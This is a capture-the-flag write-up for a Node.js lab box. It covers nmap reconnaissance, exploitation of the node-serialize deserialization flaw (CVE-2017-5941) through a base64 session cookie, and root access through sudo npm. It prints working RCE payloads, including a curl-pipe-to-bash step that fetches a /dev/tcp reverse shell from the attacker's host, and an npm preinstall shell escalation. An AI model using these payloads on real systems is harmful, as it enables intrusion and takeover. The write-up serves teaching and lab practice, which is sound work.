Port scanning

nmap --min-rate=10000 -p- 10.10.111.140
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 13:38 UTC
Nmap scan report for ip-10-10-111-140.eu-west-1.compute.internal (10.10.111.140)
Host is up (0.0068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 02:BB:33:C4:53:AB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.82 seconds
nmap -sV -sT -sC -O -p22,80 10.10.111.140
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-14 13:38 UTC
Nmap scan report for ip-10-10-111-140.eu-west-1.compute.internal (10.10.111.140)
Host is up (0.00042s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b2d9d60a745de7a99203e4294ce193c (RSA)
| 256 bf32780183af785ee7fe9c834a7daa6b (ECDSA)
|_ 256 12ab1380e5ad7307c848d5ca7c7de0af (ED25519)
80/tcp open http
|_http-title: Horror LLC
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Thu, 14 Mar 2024 13:39:07 GMT
| Connection: close
| <html><head>
| <title>Horror LLC</title>
| <style>
| body {
| background: linear-gradient(253deg, #4a040d, #3b0b54, #3a343b);
| background-size: 300% 300%;
| -webkit-animation: Background 10s ease infinite;
| -moz-animation: Background 10s ease infinite;
| animation: Background 10s ease infinite;
| @-webkit-keyframes Background {
| background-position: 0% 50%
| background-position: 100% 50%
| 100% {
| background-position: 0% 50%
| @-moz-keyframes Background {
| background-position: 0% 50%
| background-position: 100% 50%
| 100% {
| background-position: 0% 50%
| @keyframes Background {
| background-position: 0% 50%
|_ background-posi
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.93%I=7%D=3/14%Time=65F2FDFC%P=x86_64-pc-linux-gnu%r(GetR
SF:equest,E4B,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html\r\nDat
SF:e:\x20Thu,\x2014\x20Mar\x202024\x2013:39:07\x20GMT\r\nConnection:\x20cl
SF:ose\r\n\r\n<html><head>\n<title>Horror\x20LLC</title>\n<style>\n\x20\x2
SF:0body\x20{\n\x20\x20\x20\x20background:\x20linear-gradient\(253deg,\x20
SF:#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20\x20\x20\x20background-size:\x2
SF:0300%\x20300%;\n\x20\x20\x20\x20-webkit-animation:\x20Background\x2010s
SF:\x20ease\x20infinite;\n\x20\x20\x20\x20-moz-animation:\x20Background\x2
SF:010s\x20ease\x20infinite;\n\x20\x20\x20\x20animation:\x20Background\x20
SF:10s\x20ease\x20infinite;\n\x20\x20}\n\x20\x20\n\x20\x20@-webkit-keyfram
SF:es\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x2
SF:0background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20
SF:50%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x20100%\x2050%\n
SF:\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20b
SF:ackground-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x2
SF:0\n\x20\x20@-moz-keyframes\x20Background\x20{\n\x20\x20\x20\x200%\x20{\
SF:n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x2
SF:0\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-po
SF:sition:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\x20{\n\
SF:x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x20\x20\
SF:x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyframes\x20Background\x20{\n\x20\
SF:x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\
SF:x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x
SF:20\x20background-posi")%r(HTTPOptions,E4B,"HTTP/1\.1\x20200\x20OK\r\nCo
SF:ntent-Type:\x20text/html\r\nDate:\x20Thu,\x2014\x20Mar\x202024\x2013:39
SF::07\x20GMT\r\nConnection:\x20close\r\n\r\n<html><head>\n<title>Horror\x
SF:20LLC</title>\n<style>\n\x20\x20body\x20{\n\x20\x20\x20\x20background:\
SF:x20linear-gradient\(253deg,\x20#4a040d,\x20#3b0b54,\x20#3a343b\);\n\x20
SF:\x20\x20\x20background-size:\x20300%\x20300%;\n\x20\x20\x20\x20-webkit-
SF:animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\x20-
SF:moz-animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20\x20\
SF:x20animation:\x20Background\x2010s\x20ease\x20infinite;\n\x20\x20}\n\x2
SF:0\x20\n\x20\x20@-webkit-keyframes\x20Background\x20{\n\x20\x20\x20\x200
SF:%\x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20
SF:\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x20\x20\x20\x20\x20backgr
SF:ound-position:\x20100%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x20100%\
SF:x20{\n\x20\x20\x20\x20\x20\x20background-position:\x200%\x2050%\n\x20\x
SF:20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@-moz-keyframes\x20Background
SF:\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20\x20background-posi
SF:tion:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\x2050%\x20{\n\x20\x
SF:20\x20\x20\x20\x20background-position:\x20100%\x2050%\n\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20100%\x20{\n\x20\x20\x20\x20\x20\x20background-positi
SF:on:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20}\n\x20\x20\n\x20\x20@keyf
SF:rames\x20Background\x20{\n\x20\x20\x20\x200%\x20{\n\x20\x20\x20\x20\x20
SF:\x20background-position:\x200%\x2050%\n\x20\x20\x20\x20}\n\x20\x20\x20\
SF:x2050%\x20{\n\x20\x20\x20\x20\x20\x20background-posi");
MAC Address: 02:BB:33:C4:53:AB (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.22 seconds

Web

According to the room hints the site is built with Node.js. Directory brute-forcing found nothing, but the page loads one JS script:

document.getElementById("signup").addEventListener("click", function() {
    // Expiry one day in the past: this does not create a session, it
    // deletes any existing "session" cookie before the request is sent.
    var date = new Date();
    date.setTime(date.getTime() + (-1 * 24 * 60 * 60 * 1000));
    var expires = "; expires=" + date.toGMTString();
    document.cookie = "session=foobar" + expires + "; path=/";

    // The form value is appended to the URL as-is (no encodeURIComponent)
    // and sent as a POST with an empty body.
    const Http = new XMLHttpRequest();
    console.log(location);
    const url = window.location.href + "?email=" + document.getElementById("fname").value;
    Http.open("POST", url);
    Http.send();

    // Reload so the newly set cookie is presented to the server.
    setTimeout(function() {
        window.location.reload();
    }, 500);
});

It takes whatever we type into the form, appends it to the current URL as a query parameter, and sends it as a POST, i.e.:

http://ip/?email=<what we typed>

Note that the value is not URL-encoded by the script, so characters such as &, # and + would break the request. Before sending, it also overwrites the session cookie with an expiry date in the past, which clears any existing session cookie.

curl -I -X POST 'http://10.10.111.140?email=' -v
* Trying 10.10.111.140:80...
* Connected to 10.10.111.140 (10.10.111.140) port 80
> POST /?email= HTTP/1.1
> Host: 10.10.111.140
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: session=eyJlbWFpbCI6IiJ9; Max-Age=900000; HttpOnly, Secure
Set-Cookie: session=eyJlbWFpbCI6IiJ9; Max-Age=900000; HttpOnly, Secure
< Content-Type: text/html
Content-Type: text/html
< Date: Thu, 14 Mar 2024 15:35:54 GMT
Date: Thu, 14 Mar 2024 15:35:54 GMT
< Connection: keep-alive
Connection: keep-alive
< Transfer-Encoding: chunked
Transfer-Encoding: chunked

<
* Excess found: excess = 1071 url = / (zero-length body)
* Connection #0 to host 10.10.111.140 left intact

We get a session cookie back. Base64-decoded it is {"email":""}

i.e. exactly what we typed, wrapped in a JSON object. The cookie is plain base64, with no signature or MAC, so the client fully controls the object the server will later decode. (The Set-Cookie attributes "HttpOnly, Secure" are separated by a comma rather than a semicolon, which is not a valid attribute list.)

The room hints at deserialization; combined with Node.js that points to CVE-2017-5941.

The advisory describes the node-serialize module: a cookie taken from the request is passed straight into its unserialize() function. unserialize() JSON-parses the input and then eval()s any string value that starts with the marker _$$ND_FUNC$$_, treating the rest as JavaScript source. Appending () to that function turns it into an immediately-invoked function expression (IIFE), so the code runs inside unserialize() itself, which gives RCE. Here the email value we enter is placed in the JSON, base64-encoded, set as the session cookie, and deserialized by the server when the page is visited again.

Build a payload that makes the target ping our host (the \n \t whitespace is cosmetic; the payload must avoid &, # and + because the form script does not URL-encode it):

_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping -c 1 10.11.77.28',function(error,stdout,stderr){console.log(stdout)});\n}()
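To see exactly why the () at the end of the payload matters, the following is an added example (not code from the room and not node-serialize's own source): a stripped-down model of the unserialize() sink, the cookie encoding observed above, and a harmless IIFE that records that it ran instead of calling child_process. The server-side handler (handleSessionCookie) is an assumption based on the observed cookie format; the rceMarker global stands in for the real command execution.

```javascript
// Added example: model of the CVE-2017-5941 sink, not node-serialize itself.
// The real unserialize() JSON-parses its input, then eval()s any string
// value that starts with FUNCFLAG, with the remainder wrapped in parentheses.
const FUNCFLAG = '_$$ND_FUNC$$_';

// Vulnerable sink, modelled on node-serialize's unserialize().
function unserializeVulnerable(input) {
  const obj = typeof input === 'string' ? JSON.parse(input) : input;
  for (const key of Object.keys(obj)) {
    const v = obj[key];
    if (v !== null && typeof v === 'object') {
      obj[key] = unserializeVulnerable(v);
    } else if (typeof v === 'string' && v.startsWith(FUNCFLAG)) {
      // This eval is the bug: attacker-controlled source code is executed.
      obj[key] = eval('(' + v.slice(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Assumed target behaviour: wrap the submitted email in JSON and base64 it
// into the session cookie (matches the observed eyJlbWFpbCI6IiJ9 == {"email":""}).
function buildSessionCookie(email) {
  return Buffer.from(JSON.stringify({ email })).toString('base64');
}

// Assumed target behaviour on the next request: decode the cookie and
// hand it to the vulnerable unserialize().
function handleSessionCookie(cookieValue) {
  const json = Buffer.from(cookieValue, 'base64').toString('utf8');
  return unserializeVulnerable(json);
}

// Observable side effect standing in for require('child_process').exec(...).
globalThis.rceMarker = [];

// Same function body, with and without the trailing "()" that makes it an IIFE.
function iifePayload() {
  return FUNCFLAG + "function(){ globalThis.rceMarker.push('ran'); return 'iife' }()";
}
function nonIifePayload() {
  return FUNCFLAG + "function(){ globalThis.rceMarker.push('ran'); return 'fn' }";
}

// Run both payloads through the vulnerable path, and the IIFE through a
// safe path (plain JSON.parse), and report what each one did.
function demo() {
  globalThis.rceMarker.length = 0;

  const r1 = handleSessionCookie(buildSessionCookie(nonIifePayload()));
  const ranAfterNonIife = globalThis.rceMarker.length; // still 0: only a function object was built

  const r2 = handleSessionCookie(buildSessionCookie(iifePayload()));
  const ranAfterIife = globalThis.rceMarker.length;    // 1: body executed inside unserialize()

  // Safe handling: JSON.parse never executes string contents, the marker string stays a string.
  const safe = JSON.parse(Buffer.from(buildSessionCookie(iifePayload()), 'base64').toString('utf8'));

  return {
    nonIifeType: typeof r1.email,   // 'function'
    ranAfterNonIife,                // 0
    iifeResult: r2.email,           // 'iife'
    ranAfterIife,                   // 1
    safeType: typeof safe.email,    // 'string'
  };
}

console.log(demo());
```

The fix on the server side is the last branch of demo(): a session cookie should be a signed token or an opaque id, and whatever is stored in it should be read with JSON.parse, never with a deserializer that can turn strings into code.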

On Kali, listen for ICMP:

sudo tcpdump -i tun0 icmp

After submitting the payload in the form field we see ICMP echo requests arrive, which confirms command execution. Next, a reverse shell.

Start a web server on Kali (for example sudo python3 -m http.server 80; the payload fetches over port 80) and create shell.sh:

#!/bin/bash
/bin/sh -i >& /dev/tcp/10.11.77.28/1234 0>&1

Then submit this payload, which downloads the script and pipes it to bash:

_$$ND_FUNC$$_function (){\n \t require('child_process').exec('curl http://10.11.77.28/shell.sh |bash',function(error,stdout,stderr){console.log(stdout)});\n}()

Start a listener (for example nc -lvnp 1234) and we get a shell.

Privilege escalation

sudo -l shows we can run npm as root. The idea is to craft our own package whose lifecycle script is a shell, then install it: npm runs the preinstall script, and with sudo it runs as root.

TF=$(mktemp -d)
echo '{"scripts":{"preinstall":"/bin/sh"}}' > $TF/package.json
sudo npm -C $TF --unsafe-perm i

(The original had smart quotes, a missing redirect and "--unsafe perm"; the flag is --unsafe-perm, which stops older npm versions from dropping to the nobody user for lifecycle scripts when run as root.)

Ramblings

Although this is an easy-rated box, it was my first time dealing with Node.js deserialization. I spent a long time researching it; it's still pretty hard.